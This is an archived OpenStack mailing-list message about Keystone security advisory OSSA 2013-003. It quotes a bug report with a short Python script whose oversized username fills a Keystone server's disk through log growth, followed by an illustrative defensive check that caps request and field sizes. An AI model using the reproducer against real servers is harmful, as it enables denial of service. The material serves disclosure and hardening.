yahoo-eng-team team mailing list archive
Message #15175
[Bug 1098307] Re: [OSSA 2013-003] unauthenticated POST to /tokens can fill up disk/logs
Looks like status was missed. Merged properly etc, old bug cleanup
** Changed in: keystone/essex
Status: Fix Committed => Fix Released
https://bugs.launchpad.net/bugs/1098307
Title:
[OSSA 2013-003] unauthenticated POST to /tokens can fill up disk/logs
Status in OpenStack Identity (Keystone):
Fix Released
Status in Keystone essex series:
Fix Released
Status in Keystone folsom series:
Fix Released
Status in OpenStack Security Advisories:
Fix Released
Bug description:
A remote unauthenticated keystone user could potentially fill up the
disk on a Keystone server by running the following python script:
-----------------------
from keystoneclient.v2_0 import client
PASSWORD='foobar'
TENANT='blah'
USER = '00000' * 9999999
keystone = client.Client(username=USER,
                         password=PASSWORD,
                         tenant_name=TENANT,
                         auth_url='http://localhost:5000/v2.0')
-----------
Running this script will increase the log file size by 100 MB per
request. NOTE: This happens when running keystone at the default log
levels:
# verbose = False
# debug = False
Version-Release number of selected component (if applicable):
openstack-keystone-2012.2.1-1.el6ost.noarch (Red Hat)
How reproducible:
*always*
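
A defensive counterpart to the report above, added here as an example (not code from Keystone or from the bug report): a check run before any handler or logger that caps the request body, caps the credential field lengths, and bounds how much untrusted text can reach a log line. The limits, function names and sample requests are assumptions constructed for illustration.

```python
import io
import json

# Assumed, illustrative limits; not values taken from the bug report.
MAX_BODY_BYTES = 114688   # largest request body accepted
MAX_PARAM_CHARS = 64      # longest username / password / tenant name accepted
LOG_PREVIEW_CHARS = 32    # most attacker-controlled text allowed in one log line


def safe_for_log(value, limit=LOG_PREVIEW_CHARS):
    """Render an untrusted value as a bounded, escaped string for log output."""
    text = value if isinstance(value, str) else repr(value)
    extra = len(text) - limit
    preview = repr(text[:limit])  # repr() escapes newlines and control bytes
    return preview if extra <= 0 else "%s...(+%d chars)" % (preview, extra)


def check_token_request(environ):
    """Vet a POST /v2.0/tokens request; returns (http_status, short_detail)."""
    try:
        declared = int(environ.get("CONTENT_LENGTH") or 0)
    except ValueError:
        return 400, "bad Content-Length"
    if declared > MAX_BODY_BYTES:
        return 413, "declared body of %d bytes exceeds %d" % (declared, MAX_BODY_BYTES)
    raw = environ["wsgi.input"].read(max(declared, 0))  # bounded by the cap above
    try:
        auth = json.loads(raw)["auth"]
        creds = auth["passwordCredentials"]
        fields = [("username", creds["username"]), ("password", creds["password"]),
                  ("tenantName", auth.get("tenantName", ""))]
    except (ValueError, KeyError, TypeError, AttributeError):
        return 400, "malformed auth body"
    for name, value in fields:
        if not isinstance(value, str) or len(value) > MAX_PARAM_CHARS:
            shown = "<redacted>" if name == "password" else safe_for_log(value)
            return 400, "%s rejected: %s" % (name, shown)
    return 200, "ok"


def make_environ(username, password="foobar", tenant="blah"):
    """Build a constructed WSGI environ carrying a v2.0 password-auth body."""
    body = json.dumps({"auth": {"passwordCredentials": {"username": username,
                                                        "password": password},
                                "tenantName": tenant}}).encode()
    return {"REQUEST_METHOD": "POST", "PATH_INFO": "/v2.0/tokens",
            "CONTENT_LENGTH": str(len(body)), "wsgi.input": io.BytesIO(body)}
```

The detail string returned for a rejected request stays short regardless of input size, so logging it at any level cannot reproduce the disk growth described in the report.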